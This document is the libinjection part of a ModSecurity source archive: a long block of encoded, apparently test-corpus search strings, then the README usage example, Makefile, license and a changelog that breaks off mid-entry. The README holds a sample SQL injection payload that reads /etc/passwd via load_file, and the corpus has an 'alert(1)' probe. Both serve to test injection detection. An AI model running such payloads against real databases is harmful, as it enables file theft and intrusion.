EC-2HM85288X8372881C 4/_ZBKO2JKUCJC73C8KPIUDTJ3IMGM MATS 5" BY 7" I'M AFRAID SO. YOU'RE ENTIRELY BONKERS. BUT I'LL TELL YOU A SECRET THE BEST PEOPLE ARE" - ALICE HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE JACK-O'-LANTERN? 7 AND A HALF 7 FOR ALL MANKIND 5 AND A QUARTER BY 8 INCHES 40 AND FAB 6 KEY CHAR 3 FOR 20 F AND A NECKLACE 21 LONG IN FD AND C COSMETIC COLORANT 2 OR 4 METAL BUTTONS 13 IS A LUCKY NUMBER 1 AND 1/2" BUTTON "DARE TO BE AWESOME": "ALASKA" + 1978 10 DOUBLE LOOP SETS B IS FOR BLACK BY TATIANA SOROKA DANCIN' LIKE A ROBOT ON FIRE D AND D DICE BE TRUE 2 U B AND A PRINTS "SWEATER DRESS" AND "CHRISTMAS" SMALL "& SIGN 9-2-5 BLACK PUMPS 2-3/4 CELLO BAGS 30-30-60 INVITE 11-11-11 DAY POPPY 4-1-7-CUEIPNJF1QIETPB8PQBVZ5 1-1/8 PLUGS 1 1/8 PLUGS 1&1/8 PLUGS 909-527-9247 +1 (917) 666-0987 (9178787873) (junk) "PINK ROSES" -DRESS -CLOTHES -SWEATER -COAT -JACKET -SKIRT -PANTS -SHIRT DRESS SIZE 20" -PATTERN -BABY "CROSS STITCH" -PDF -WOOL DRESS WITH HAT 18'; 2:1320316063:9-3Z6OMATJOWG5BO2JWF3I2S0QEN:XXMET8ACIJ1CVLEHB5MBBW-NPIEQ:0440D7CD127A7FBFCB9D17B01D38FB0A7C0EBC11 HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE - STEAMPUNKVINTAGEFIND AT ETSY G194 IN ORDER TO USE SEARCH BEGIN EACH DAY WITH LOVE SQL-3-RMGN_V-BBNGV40NGQRAGGZ IF-9-86MDXMB1Z-FINBSB4WIDF-B HTTP://CONTUBO.TV/VIDEOS/1949/2-BEST-MINIFALDAS,-TANGAS,CULONAS-MINISKIRTS"-BIKINIS-"SEXY-GIRLS"-BOOBIES-BOOTTIES GROUP UPDATE FACEBOOK LINK NOT PROVIDED CHRISTMAS STOCKING "NOT" STUFFER ORDER@ALLTHATSHEWANTS.US ALL@MKSAT.NET ALL NATURAL SHA WHERE IS THE SHOW "ALASKA" + 1978 SMALL "&" SIGN 50%2526%252339%253Bs VINTAGE CARVED BEAD'" -LUCITE -PLASTIC pr_shop%22%3EMamaBearBabyWear%3C/a%3E poem+'if' CRAFT SHOW SET DIARY WITH LOCK CLIP ON READ CLOCK WITH KEYS THERE IS NOT PLACE LIKE HOME BASE; SET SWAROVSKI LED -(ZEPPELIN) LIFE IS NOT ABOUT WAITING FOR THE STORM TO PASS 70" ROUND TABLE CLOTH "CASE" "RIGHT ON" "NOT ALL WHO WANDER" V1_OTHER_1">ETSYFOO BLAH FOO BLAH FOO RSCHMIDT @FPMC-WILLMAR/COM XSERVING"; ";PLATTER"; ";VINTAGE"; /SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1 LLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;''''''''''''''''''''''''''''''''''''''''''''''';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKL;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;';;LK SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) -- SWIRLS DIGITAL SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) -- 10 DIGITAL PAPERS -- 122 HTTP://WWW.MECKMOM.COM/MMDL/CHRISTMAS BUDGET PLANNER.PDF';" HREF="HTTP:/WWW.MECKMOM.COM 1.5 WITH 1/2 INCH LOOP END LOBSTER 60;S MOD DRESSES 7" #2 CIRCULAR NEEDLE 9/PLUGS AND TUNNELS 9/16PLUGS AND TUNNELS "NOT ON FACEBOOK" "#2 MOM" 80%25 ACRYLIC AND 20%25 WOOL 35%25 COTTON AND 65%25 POLYESTER. 5685587||ORDER=||SECTION_ID=||PAGE=2 {%25 $SENDER_FULL_NAME %25} BLAH BLAH BLAH {%25 $CONVO_SEND_DATE|DATE_FORMAT:'%25B %25D, %25Y' %25}. UJUUUI8UJKPKJMMJUMNMJUJMMNNJUJMNJJJMNJKJMJJKBJ9I8UJJMMNJNJJJJJJNNKJNMKUJJUNKJJJNJNJKJJJJJJJJJMNJJJJJKJIJJJJJJJJJJJJJJJJJGGGFSAQWERTYUIOP[]';LKGFDSAZXBNM,. BAMBOO CHARCOAL SOAP 1 '# BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' -SHOES -SANDLES -HEEL --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS REGARDEZ BOOKMAR';[K]] WOOL AND ACRYLIC FOR SOFTNESS 01/DEC/2011:20:45:25 0;1;0;1;0 5-DEC-QRIBMKCDNBUO2ELCW2FGFI WOMEN';S ART DEC DO OR NOT DO, THERE IS NO ABC AND 123 WALL DEC 1.5 WITH 1/2 INCH LOOP END "NOT FOR SALE" "IS" STAMP "LIKE" STAMP /SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1 1950' AND 60'S WOMEN'S COATS WITH FAKE FOO; BAR 1+2+3 WO;DCAT[JPTPGRA][ /SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK PRO DECALS 15"&PAGE=2 /SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK+PRO+DECALS+15&PAGE=2 %2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%26PAGE%3D2 %2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%22%26PAGE%3D2 KNICKIN' AND KNACKIN' SEE WHAT ONFIRE'S PACKIN' FOR CHRISTMAS BY ANNIE BECWAR 0=[]' "AS FOR ME AND MY "EXIT, PURSUED B "EXIT, PURSUED BY 4%27%2BX%2B4%27%2BWOOD 48%22%2BX%2B48%22%2BMODERN%2BART 90-%2B6%2BINCH %2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D20%22%2BX%2B20%22%2BPILLOW%2BCOVER%2BGREEN%2BPATTERN%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS %2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22NOT%2BAMUSED%22%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DZZ%26VIEW_TYPE%3DGALLERY%26PAGE%3D4 %2FSEARCH%2FHANDMADE%2FPLANTS_AND_EDIBLES%3FSEARCH_SUBMIT%3D%26Q%3D%22SET%2BOF%2B6%22%26MAX%3D18%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DUS%26VIEW_TYPE%3DGALLERY %2FSEARCH%2FVINTAGE%3FSEARCH_SUBMIT%3D%26Q%3D%22TABLE%2BLAMP%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D10 %2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DSHABBY%2B%22AND%2BWHITE%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D6 %2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DSILVER%2BCHAIN%2B20%22%26FILTER%5B0%5D%3DSUPPLIES %2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%5B0%5D%3DVINTAGE %2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%3DVINTAGE %2FSEARCH%2FHANDMADE%3FQ%3DYELLOW%2BPHOTOGRAPHY%2BBACKDROP%2B%2B-3%27%2B-4%27%2B-DIGITAL%2B-MINI%26VIEW_TYPE%3DGALLERY HTTP%3A%2F%2FDEEDEECAMPBELL.BLOGSPOT.COM%2F2011%2F12%2FHAPPY-SNOWMAN-TAG.HTML%3FUTM_SOURCE%3DFEEDBURNER%26UTM_MEDIUM%3DFEED%26UTM_CAMPAIGN%3DFEED%3A%2BSCRAPPINWITHDEEDEE%2B%28SCRAPPIN%27%2BWITH%2BDEEDEE%29 RECLAIMED%20WOOD%22%20%2B%20%22SIGN%22%20%2B%20%22PRIMITIVE%22 %22MOD%22%20%22 /SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22MOD%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D14 /SEARCH%3FSEARCH_SUBMIT%3D%26Q%3D36%22%2BX%2B48%2B%22%2BFRAME%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS DO%20OR%20NOT%20DO DO%20OR%20NOT%20DO%2C 9%216%2BEARINGS %22NOT+GAY+AS+I %22+-+%22MAGAZINE%22 FAITES+UN+TOUR+SUR+NOTRE+NOUVELLE+%3CBR+%2F%3E%3CA+HREF%3D%22%2FAPPS%2F%22%3EGALERIE+D%27APPLICATIONS%3C%2FA%3E%21 RENCONTREZ+DES+PERSONNES+AVEC+QUI+VOUS+AVEZ+DES+INTRTS+COMMUNS+ET+COLLABOREZ+AVEC+EUX.+TROUVEZ+DES+TEAMS+LOCAUX++REJOINDRE+SUR+LA+%3CA+HREF%3D%22%2FTEAMS%2F%22%3EPAGE+DES+TEAMS%3C%2FA%3E FHFUIVJGUJOKKIIKIIOJKK%5BI%5B%27%3D%5C%5D%3D-%5DL%3B/... %27-%228 %27-%228%20TRACK%22 %27-%228%20TRACK%20PL 2%20got%20%40AOL.COM L%3BIN%20TABLE%20RUNNER OW%3BCAST%20IRON%20TRIVETS /SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26REF%3DAUTO%26Q%3DPICTURES%2BFRENCH%2B11%22%2B-%2B14%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS SET%208%20-MINI%20AS 1/4%22-1/2RIBBON 1/4%22-1/RIBBON PHILLIPKEEGAN-777-%40HOTMAIL.COM AUG%2B15%2BKEYS %22foo%22+AND+%22bar%22+AND %22foo%22+AND+%22bar%22 %22WILD+OLIVE%22+%2B+%22YELLOW+CHERRIES%22 %22WHITE%22+%2B+%22PLATE%22+%2B+%22POTTERY%22 FOO+BAR%27%23+BLAH 5%2F8%2BLOOP CONNECTORS+%2B+2-PRONG 50%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS 50PCS%2BANTIQUE%2BBRONZE%2BFINISH%2BCONNECTORS%2B8MM%2B%280633%29 32%2BKRAFT%2BBROWN%2B%22HANDMADE%22%2BSTICKER 25%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS %281156-MG%29%2BNEW%2BMATTE%2BGOLD%2BPLATED%2BTEXTURED%2BLINKED%2B3-RING%2BPENDANTS %22CROSS+STITCH%22+%2B+%22TREE+SKIRT %2FSEARCH%3FQ%3D15%22%2BLAPTOP%2BCASE%26PAGE%3D6 %2BIPHONE%2B4%2BCASE %22TERRACE%22++-++1932++-++WM.+ROGERS+MFG.+CO. %22ATEAM%22+AND+AND+%22GIFT+CERTIFICATE%22 %22CLIP+ON%22+-EARRING%2A+-SWEATER+-SHOE%2A+-TIE%2A+-EPHEMERA+-CUFFLINK%2A+-HAIR+-BARRETTE%2A+-DRESS%2A+-BROOCH%2A+-PIN%2A+-MONEY+-PRINT 4%2FABKDFAY1YORLFIM6NZYU8DTZP1-1 %2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DPIN%2B%22AS%2BIS%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS %2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22AND%2BWHEN%2BTHE%2BKIDS%2BARE%2BOLD%2BENOUGH%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS THING%2B1%2BAND%2BTHING%2B2 1Q9D819XMTILZVG1BOBY27-4-ROW NOT+AS+SAD+AS+I+USED+TO+BE NOT+AS+SAD+AS+I IPHONE%2B4%2BCASE%2BRUSSIAN COPPER%2B20%2BROUND CASE+FOR+KINDLE+WITH+KEYBOARD %2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22LIKE%22%2BSTAMP%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS MISTERGLAS.DK%27%2A%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27 BIRTHDAY%2B12%2BMONTH%2B 6R2OS3JNSM-48-IN-0ZENVYLUJJL 14+1%2F2%22+-+USUALLY+FOR+3+MONTHS+TO+6+MONTHS XVPG_TLIHBUY60_ZHXPSA-4-PI-P GALLERY%3D1%3D5 I+%3C3+%3C3 I+%3C3+%3C3+THE+DOCTOR SIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS%2BSTARTER%2BKIT 4%7C28940%7C10142125%7C6003940396642%7C6003940506642%7C%7C%7CTC%7C%7CC%7C%7C%7C -3-B39RBBO58YMVIHEVAUZBS-6TF .75+%22+X+1.5%22 "SIGNAL LOCK" 3 TABLE LAMP WITH FLOWERS 9483773&REFERRING_LISTING_ID=62611583&REF=LS_CONTACT_BOTTOM 1950 UNION MADE EWELRY; __UTMC=111461200; __UTMB=111461200.37.10.13431224 1 AND A1/2 INCH LIME GREEN GROSGRAIN RIBBON 3271888&SR=1-1-SPELL&KEYWORDS=LEGAND+POSTER SHELL IS 65 AND 35 POLY COTTON BLEND Y; __UTMC=111461200; __UTMB=111461200.29.10.1342974283 5EOR-5MDKFIKK50HAHCPYPUVLG-2 LISTING-PRICE"> P="L TING-PRICE"> foo.com # bogus 1alert(1) foo 'null' bar User(foo),junk User(login_name),Images(url_170x135) mr and mrs table sign USPS 1-3 Day (USPS doesn't guarantee 3 day arrival) foo or bar add 1 Apt is gated; call when you get here, and we'll come down to get it. DaVi - Open and Close Your Blinds With Your Phone! Foo and 80's Foo / Bar Work Time (Rosewood, Lavender, Bergamot, Grapefruit) Recommended Same as reward #1 however foobar sent you 1 message about 4.7" & iPhone 6 Plus 5.5 Family and friends having meal outdoors #include #include #include "libinjection.h" #include "libinjection_sqli.h" int main(int argc, const char* argv[]) { struct libinjection_sqli_state state; int issqli; const char* input = argv[1]; size_t slen = strlen(input); /* in real-world, you would url-decode the input, etc */ libinjection_sqli_init(&state, input, slen, FLAG_NONE); issqli = libinjection_is_sqli(&state); if (issqli) { fprintf(stderr, "sqli detected with fingerprint of '%s'\n", state.fingerprint); } return issqli; } ``` ``` $ gcc -Wall -Wextra examples.c libinjection_sqli.c $ ./a.out "-1' and 1=1 union/* foo */select load_file('/etc/passwd')--" sqli detected with fingerprint of 's&1UE' ``` More advanced samples: * [sqli_cli.c](/src/sqli_cli.c) * [reader.c](/src/reader.c) * [fptool](/src/fptool.c) VERSION INFORMATION =================== See [CHANGELOG](/CHANGELOG) for details. Versions are listed as "major.minor.point" Major are significant changes to the API and/or fingerprint format. Applications will need recompiling and/or refactoring. Minor are C code changes. These may include * logical change to detect or suppress * optimization changes * code refactoring Point releases are purely data changes. These may be safely applied. QUALITY AND DIAGNOSITICS ======================== The continuous integration results at https://travis-ci.org/client9/libinjection tests the following: - [x] build and unit-tests under GCC - [x] build and unit-tests under Clang - [x] static analysis using [clang static analyzer](http://clang-analyzer.llvm.org) - [x] static analysis using [cppcheck](https://github.com/danmar/cppcheck) - [x] checks for memory errors using [valgrind](http://valgrind.org/) - [x] code coverage online using [coveralls.io](https://coveralls.io/github/client9/libinjection) LICENSE ============= Copyright (c) 2012-2016 Nick Galbreath Licensed under the standard [BSD 3-Clause](http://opensource.org/licenses/BSD-3-Clause) open source license. See [COPYING](/COPYING) for details. EMBEDDING ============= The [src](https://github.com/client9/libinjection/tree/master/src) directory contains everything, but you only need to copy the following into your source tree: * [src/libinjection.h](/src/libinjection.h) * [src/libinjection_sqli.c](/src/libinjection_sqli.c) * [src/libinjection_sqli_data.h](/src/libinjection_sqli_data.h) * [COPYING](/COPYING) modsecurity-v3.0.4/others/libinjection/Makefile0000644000175000017500000000110513607066311022122 0ustar zimmerlezimmerle SUBDIRS=src all: (cd src; ${MAKE} all) check: (cd src; ${MAKE} check) clean: @(cd src; ${MAKE} clean) .PHONY: all check clean docker-console: docker run --rm -it \ -e COVERALLS_REPO_TOKEN=$COVERALLS_REPO_TOKEN \ -v $(PWD):/build \ -w /build \ nickg/libinjection-docker \ sh docker-console-workspace: docker run --rm -it \ --volumes-from workspace \ -w $(PWD) \ nickg/libinjection-docker \ sh docker-ci: docker run --rm \ -e COVERALLS_REPO_TOKEN=$COVERALLS_REPO_TOKEN \ -v $(PWD):/build \ -w /build \ nickg/libinjection-docker \ ./make-ci.sh modsecurity-v3.0.4/others/libinjection/COPYING0000644000175000017500000000304713607066311021524 0ustar zimmerlezimmerleCopyright (c) 2012-2016, Nick Galbreath All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. https://github.com/client9/libinjection http://opensource.org/licenses/BSD-3-Clause modsecurity-v3.0.4/others/libinjection/CHANGELOG.md0000644000175000017500000003076713607066311022313 0ustar zimmerlezimmerle# NEXT * [#126](/client9/libinjection/issues/126) oracle false negative * [#117](/client9/libinjection/issues/117) [#116](/client9/libinjection/issues/116) - overread in XSS * [#112](/client9/libinjection/issues/112) fix shared library on macOS * [#122](/client9/libinjection/issues/122) [#115](/client9/libinjection/issues/115) - false positive issue for XSS * [#113](/client9/libinjection/issues/113) save space in struct * [#126](/client9/libinjection/issues/126) add usage to sqli cli tool * [#125](/client9/libinjection/issues/125) many false positives * [#114](/client9/libinjection/issues/114) false negative with TSQL and "IF NOT" operation # v3.9.2 - 2016-05-21 * Release of whatever changes have been made over the last 2.5 years. # v3.9.1 - 2013-12-26 Day-After-Christmas Edition * No functional changes * Code reverted to strict C90 style to allow builds on embedded systems, Windows and FreeBSD * For gcc this means `-std=c90 -pedantic`, which seems to simulate Windows behavior on Linux * Other minor style changes to header files. # v3.9.0 - 2013-11-29 Black Friday Edition * Big API Change!! everything in `libinjection.h` is now `libinjection_sqli.h`. And a new super simple API is in `libinjection.h` * Improvements to folder to prevent bypasses using SQL types (casts). This eliminated about 400 fingerprints as well. * Blacklisted a very degenerate MySQL ODBC case, that is highly unlike to be used in 'real inputs'. thanks to @LightOS foreporting.. not clear who found it originally. * Over 400 unit tests now! * Compiles clean under clang with `-Weverything -Wno-padded` `-Wno-padded` is excluded since it's architecture dependant. See `clang.sh` to see how to invoke. * PHP documentation fixes, thanks @LightOS # v3.8.0 - 2013-10-18 LAMP Special Edition: MySQL and PHP improvements * [Issue #33](https://github.com/client9/libinjection/issues/54) Fixes MySQL in latin1-mode use of `%A0` as whitespace. This was tricky since `%A0` might be part of larger UTF-8 encoding as well. Or perhaps `%C2%A0` (utf-8 encoding) might be treated as whitespace. Fortunately, MySQL only seems to treat `%A0` as whitespace in latin1 mode. HT [@ru_raz0r](https://twitter.com/ru_raz0r) * Fixes to Lua testdriver and portability fixes * Much improved PHP build and test. It now uses `phpize` and builds and tests like a real module. * API CHANGE: the macro `LIBINJECTION_VERSION` has been replaced by `const char* libinjection_version()`. This allows us to increment the version number without having to regenerate SWIG (or other) bindings for minor releases. NOTE: Pregenerated [SWIG](http://www.swig.org/) bindings are removed. You'll need to install SWIG before running `make`. SWIG is packaged on virtually every OS so this should not be a problem. Here's why: * Latest versions of swig appear to generate poor quality bindings for LUA and Python. Bugs are filed upstream [1341](https://sourceforge.net/p/swig/bugs/1341/), [1343](https://sourceforge.net/p/swig/bugs/1343/), [1345](https://sourceforge.net/p/swig/bugs/1345/). These are fixed or will be fixed in swig 3.0.0. * In addition, I've received a number of reports of generated code failing various static analysis * I can't triangulate which SWIG for which language for which OS will work for you * I may be switching to [libffi](http://cffi.readthedocs.org/) for python, and [luajit.ffi](http://luajit.org/ext_ffi.html) for lua(jit) in the future, anyways. # v3.7.1 -- 2013-10-13 * Remove un-needed code # v3.7.0 -- 2013-10-13 Major Release * [Issue #54](https://github.com/client9/libinjection/issues/54): Add test vectors from [Arne Swinnen](http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/). Thanks [qerub@github](https://github.com/qerub) * Minor fingerprint update for [Issue #54](https://github.com/client9/libinjection/issues/54). I don't really think it's valid SQL but it's safe enough to detect without false positives. * [Issue #55](https://github.com/client9/libinjection/issues/55): Parse MS SQLSERVER use of \[brackets\] for column and table names. This is a big one that closes a lot of holes. Thanks [nroggle@github](https://github.com/nroggel) * [Issue #56](https://github.com/client9/libinjection/issues/56): fix buffer over-read. Thanks [safe3@github](https://github.com/Safe3) and [flily@github](https://github.com/flily) * Remove use of `-fstack-protector` as it breaks valgrind detecting memory problems Read more about it http://blog.client9.com/2013/10/12/gcc-valgrind-stackprotector.html * Fixed folding issue where `1,-sin(1))` would be folded as `1 (1)` * Add more test cases and improved test coverage to [98.8%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html) # v3.6.0 -- 2013-09-11 * New PHP API * Big fingerprint update ** about 500 new fingerprints added based on fuzzing tests by Reto Ischi ** about 700 impossible, dead fingerprints removed ** adding folding rule for "sqltype sqltype -> sqltype" since `select binary binary binary 1` is valid * Other minor fingerprints added * -maybe- API change as typedefs and structs were re-arranged for SWIG # v3.5.3 -- 2013-08-25 * Fingerprint update -- `BETWEEN` operation bypasses * Fingerprint update -- `ANY/SOME` quasi-function bypasses * Fixed issue with folding where `1-(2-3)` would fold to "nothing" instead of `1` * Improved test coverage to [98.0%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html) * More adjustments to the PHP/MYSQL backtick to reduce false positives # v3.5.2 -- 2013-08-21 * Fingerprint update. Credit: Reto Ischi # v3.5.1 -- 2013-08-21 * found regression in handling of PHP/MySQL backticks. Tests added * Dead code removed. * Improved test coverage to [97.7%](https://libinjection.client9.com/cicada/artifacts/libinjection-coverage-unittest/lcov-html/c/libinjection_sqli.c.gcov.html) # v3.5.0 -- 2013-08-21 * Bug fix for libinjection_sqli_reset @brianrectanus https://github.com/client9/libinjection/pull/50 * Non-critical parser fix for numbers with oracle's ending suffix. "SELECT 1FROM .." -> (SELECT, 1, FROM) not (SELECT, 1F, ROM) * Yet another fix for disambiguating Oracle's "f" suffix for numbers HT @LightOS * Better parsing of generated number forms of "10.e" and "10.10e" (these are actually table specifiers!) HT @LightOS * Change sizing of some static arrays to have a length >= 8 For GCC based applications, this allows -fstack-protector to work and -Wstack-protector will now not emit errors. * Added '-fstack-protector-all -D_FORTIFY_SOURCE=2' to default CFLAGS. About 10% performance loss with -fstack-protector-all * Improvements in reducing false positives, HT modsecurity team * Add fingerprint, HT @FluxReiners * Support for parsing of old ODBC-style typing, e.g. 'select {foo 1};' (valid in MySQL) * Fix tokenization of "IF EXISTS(....", "IF NOT EXISTS(..." * Fi possible stack over-read, and improve detection of "sp_password" flag in short sqli HT modsecurity team # v3.4.1 2013-07-18 * Fingerprint update only HT @LightOS # v3.4.0 2013-07-18 * Fix regression with COLLATE * Handle "procedure analyze" under MySQL * Make API most robust when setting flags * Add folding API * Add new all-C test driver to improve testing speed * Makefile cleanups * Fired Jenkins! Using in-house system. * Fixed bypass reported by @FluxReiners # v3.3.0 2013-07-13 * change how backslash is handled to catch old MSSQL servers sqli See http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR for details * Reworking of COLLATE to handle MySQL, TSQL types automatically * Handle bizarro world TSQL '\%1' which is parsed as "0 % 1" * Better stacked query detection, fixing some regressions * Folding improvements * False positive improvements # v3.2.0 2013-07-12 * Parse binary litterals "0b010101" used by at least mysql and pgsql * Add fingerprints '1&EUE', '1&EkU' to work around ambiguous parsing rules "-1.for" == '-1.f OR' vs. '-1. FOR' CREDIT @LightOS * Add parsing rules for COLLATION in MySQL, CREDIT @LightOS * Reduce false positives by removing all fingerprints that contained "sn" * Improvement in handling MySQL 'binary' quasi-operator/type * Improvements in folding * Removed dependency on SWIG for installing python module # v3.1.0 2013-07-02 * Fix for parsing Oracle numeric literals * Fix for oracle whitespace with null char. * Add unusual SQL join types to keywords lists * Minor fixes to python API examples # v3.0.0 2013-06-23 Big Release and Big Engine change. Highly recommend * Numerous evasions and false positives fixed! * Tokenizer is now really dumb, and publically exposed. See `libinjection_sqli_tokenize`. * Folding engine completely rewritten to be simpler and easier to extend, debug, port. * MySQL `backticks` now handled correctly * @"var" and @'var' parsed correctly (mysql) * ":=" operator parsed correctly * non-ascii SQL variables and barewords handled correctly * less false positives and those that are false positives are more "indeterminate cases" and are only in a few fingerprints * autogeneration of fingerprints with trivial SQL variations * support for pgsql $ strings * support for oracle's q and nq strings * support for mysql's n strings * parsing stats exposed * new swig bindings for python and lua, with callbacks into original scripting language for accept/reject of fingerprints (i.e. manage fingerprints in script, not C code) * Improved parsing of various special cases in MySQL * Ban MySQL conditional comments. If we find them, it's marked as SQLi immediately. * Probably a bunch of other stuff too # v2.0.4 2013-05-21 IMPORTANT All users are advised to upgrade due to risk of DOS ## security * more fingerprints, more tests * Issue 34: fix infinite loop # v2.0.3 2013-05-21 ## security * Add variations on '1U(((', thanks @LightOS * Add automatically all variations on other cases of 'parens padding' # v2.0.2 2013-05-21 ## security * Added fingerprint 'nU(kn' and variations, thanks to discussion with @ModSecurity . # v2.0.1 2013-05-21 ## security * Added fingerprint knknk, thanks @d0znpp # v2.0.0 2013-05-17 Version 2 is more a software engineering release than SQLi. The API, the code, and filenames are improved for embedded use. Please see the README.md file for details on use. ## security * Fix Issue30: detection of more small sqli forms with fingerprint "1c". * Fix Issue32: false positive of '*/*' of type 'oc' Thanks to @brianrectanus ## API Changes BIG CHANGES * File name changes. These are the only relevant files: * `c/libinjection.h` * `c/libinjection_sqli.c` * `c/libinjection_sqli_data.h` * `COPYING` * Just need to include `libinjection.h` and link with `libinjection_sqli_.c` * `sqlparse_private.h` and `sqli_fingerprints.h` are deprecated. Only use `#include "libinjection.h"` * API name changes `is_sqli` and `is_string_sqli` are now `libinjection_is_sqli` and `libinjection_is_string_sqli` * API change, `libinjection_is_sqli` now takes a 5th arg for callback data * API change, `libinjection_is_sqli` accepts `NULL` for arg4 and arg5 in which case, a default lookup of fingerprints is used. * `sqlmap_data.json` now includes fingerprint information, so people making ports only need to parse one file. ## other * Allow `clang` compiler (also in Jenkins, a build with clang and make-scan is done) * Optimizations should result in > 10% performance improvement for normal workloads * Add `sqlite3` special functions and keywords (since why not) # v1.2.0 2013-05-06 ## security * fix regression in detecting SQLi of type '1c' ## * improved documentation, comments, edits. # v1.1.0 2013-05-04 ## security * Fix for nested c-style comments used by postgresql and transact-sql. Thanks to @Kanatoko for the report. * Numerous additions to SQL functions lists (in particular pgsql, transact-sql and ms-access functions) Thanks to Christoffer Sawicki (GitHub "qerub") for report on cut-n-paste error. Thanks to @ryancbarnett for reminder that MS-ACCESS exists ;-) * Adding of fingerprints to detect HPP attacks. * Algorihmically added new fingerprints to detect new 